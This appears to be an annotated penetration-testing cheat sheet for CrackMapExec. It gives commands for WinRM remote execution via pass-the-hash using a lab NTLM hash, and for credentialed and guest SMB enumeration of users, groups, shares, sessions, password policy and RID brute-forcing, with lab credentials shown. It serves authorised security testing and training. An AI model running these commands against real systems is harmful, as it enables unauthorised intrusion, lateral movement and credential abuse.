
crackmapexec

CrackMapExec is a post-exploitation tool used for penetration testing and security assessments. CrackMapExec can be used to enumerate users, domains, and computers within a network, extract password hashes and plaintext passwords, execute commands on remote systems, and escalate privileges. It is capable of performing various network attacks such as password spraying, brute-force attacks, and pass-the-hash attacks. It supports various protocols including SMB, HTTP, and LDAP, and can be integrated with other tools like Metasploit and PowerSploit.

  • vnc
  • ssh
  • ftp
  • rdp
  • mssql
  • ldap
  • smb
  • winrm

# Show the global help, then the per-protocol help for the modules this sheet
# uses (mssql, smb, ssh, winrm), in that order.
# NOTE(review): sudo is kept for parity with the rest of the sheet, but reading
# help text does not need root; confirm whether your install needs it at all.
sudo crackmapexec --help
for proto in mssql smb ssh winrm; do
  sudo crackmapexec "$proto" --help
done

WinRM (port 5985)


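# Usage template — the '<...>' placeholders are quoted so the line is valid shell
# (unquoted <IP> would be parsed as a redirection); replace them before running.
#   -H  authenticate with the account's NTLM hash instead of a password
#   -X  run the quoted PowerShell command on the host over WinRM
crackmapexec winrm '<IP>' -u '<USER>' -d '<DOMAIN>' --port '<PORT>' -H '<NTLM_HASH>' -X "hostname"

# Worked example against the lab host held in $LOCAL; the hash is a lab value.
# NOTE(review): this is remote command execution, so expect it to leave WinRM
# session and process-creation records on the target.
crackmapexec winrm "$LOCAL" -u Administrator -d 'INLANEFREIGHT.LOCAL' --port 5985 -H 27dedb1dab4d8545c6e1c66fba077da0 -X 'ls C:\Users\Administrator\Desktop'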

SMB


Enumeration with valid credentials

domain user enumeration

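# Domain user enumeration over SMB with a valid credential; the second form
# also pins the target domain with -d.
# NOTE: USER is normally pre-set by the login shell to the local account name,
# so set IP/USER/PASS (and DOMAIN) explicitly before running — otherwise the
# command silently authenticates with the wrong principal.
# NOTE(review): root is not normally needed for the smb module; prefer running
# unprivileged — confirm for your install.
sudo crackmapexec smb "$IP" -u "$USER" -p "$PASS" --users
sudo crackmapexec smb "$IP" -d "$DOMAIN" -u "$USER" -p "$PASS" --users
# Lab example (keep real engagement credentials out of shared notes):
# sudo crackmapexec smb 172.16.5.5 -d INLANEFREIGHT.LOCAL -u SAPService -p '!SapperFi2' --users | tee ad_users.txt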

domain group enumeration

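# Domain group enumeration over SMB with a valid credential.
# Expansions are quoted so a password containing spaces or glob characters is
# passed intact; set IP/USER/PASS explicitly first (USER defaults to the local
# login name).
sudo crackmapexec smb "$IP" -u "$USER" -p "$PASS" --groups
# Lab example:
# sudo crackmapexec smb 172.16.5.5 -d INLANEFREIGHT.LOCAL -u SAPService -p '!SapperFi2' --groups | tee ad_groups.txt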

list members of a local group

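# Membership of a local group: --users names the account to look up and
# --local-groups names the group. Both placeholders are quoted (the unquoted
# <USER_NAME> form would be parsed as a redirection), matching the
# '<GROUP_NAME>' convention used elsewhere in this sheet.
sudo crackmapexec smb "$IP" -u "$USER" -p "$PASS" --users '<USER_NAME>' --local-groups '<GROUP_NAME>'
# Lab example:
# sudo crackmapexec smb 172.16.5.5 -u SAPService -p '!SapperFi2' --users SAPService --local-groups 'Account Operators'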

logged-on user enumeration

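# List users currently logged on to the target (authenticated SMB query);
# expansions quoted so the credential is passed as a single argument.
sudo crackmapexec smb "$IP" -u "$USER" -p "$PASS" --loggedon-users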

share enumeration

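# List SMB shares on the target and the access the supplied credential has to
# each; expansions quoted so the credential is passed as a single argument.
sudo crackmapexec smb "$IP" -u "$USER" -p "$PASS" --shares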

share enumeration and listing of all readable files

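# Walk the named share with the spider_plus module and list the files the
# credential can read. Replace '<SHARE_NAME>' before running.
# NOTE(review): the module writes its listing to a local results location
# (see the module's options); treat that output as sensitive data.
sudo crackmapexec smb "$IP" -u "$USER" -p "$PASS" -M spider_plus --share '<SHARE_NAME>'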

obtain password policy

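# Retrieve the domain password policy (lockout threshold, minimum length, ...)
# with a valid credential; expansions quoted so the password stays one argument.
sudo crackmapexec smb "$IP" -u "$USER" -p "$PASS" --pass-pol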


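# Install the prebuilt v5.3.0 release binary (Ubuntu / Python 3.10 build).
# NOTE(review): the archive is downloaded without any integrity check; compare
# it against a checksum obtained from a trusted source (<EXPECTED_SHA256>,
# placeholder) before executing anything extracted from it.
wget https://github.com/Porchetta-Industries/CrackMapExec/releases/download/v5.3.0/cme-ubuntu-latest-3.10.zip -O crackmapexec.zip
unzip crackmapexec.zip
# Rename the extracted binary. The original line used 'mc' (Midnight
# Commander), which is a typo for mv.
mv cme crackmapexec

# Enumeration as the built-in 'guest' account with an empty password; each line
# opens a separate SMB session against the target and should run without root.
# Defensive note: guest-session queries like these are a common reconnaissance
# signal — hardening guidance is to disable the guest account and restrict
# anonymous/guest SMB access.
crackmapexec smb "$IP" -u 'guest' -p '' --users
crackmapexec smb "$IP" -u 'guest' -p '' --shares
crackmapexec smb "$IP" -u 'guest' -p '' --groups
crackmapexec smb "$IP" -u 'guest' -p '' --local-groups
crackmapexec smb "$IP" -u 'guest' -p '' --loggedon-users
crackmapexec smb "$IP" -u 'guest' -p '' --rid-brute
crackmapexec smb "$IP" -u 'guest' -p '' --sessions
crackmapexec smb "$IP" -u 'guest' -p '' --pass-pol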

source https://github.com/Porchetta-Industries/CrackMapExec